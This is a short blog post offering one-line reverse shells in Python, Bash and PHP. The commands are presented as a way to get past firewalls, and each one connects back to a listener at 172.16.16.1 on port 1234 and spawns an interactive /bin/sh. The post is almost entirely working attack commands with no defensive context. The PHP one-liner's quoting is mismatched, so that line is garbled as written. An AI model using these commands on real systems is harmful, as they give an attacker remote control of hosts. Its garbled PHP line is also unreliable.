Jeet Kune Crypto: One Line Reverse Shells with Scripting Languages

Reverse shells are extremely useful for subverting firewalls or other security mechanisms that may block new opened ports. Often you’ll find hosts already have several scripting languages installed. We’re going to take advantage of the some of the most popular of those languages, to spawn a reverse shell.

In these scenarios, your listening IP is 172.16.16.1 and your listening port is 1234.

Python Reverse Shell:

This python one line reverse shell is kind of a trip. Trust me, nobody expects you to remember this one, off of the top of your head.

python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("172.16.16.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'

BASH Reverse Shell:

This one is simple. Everyone expects you to remember something like this, off of the top of your head.

bash -i >& /dev/tcp/172.16.16.1/1234 0>&1

PHP Reverse Shell:

From terminal:

php -r '$sock=fsockopen("172.16.16.1",1234);exec("/bin/sh" -i <&3 >&3 2>&3");'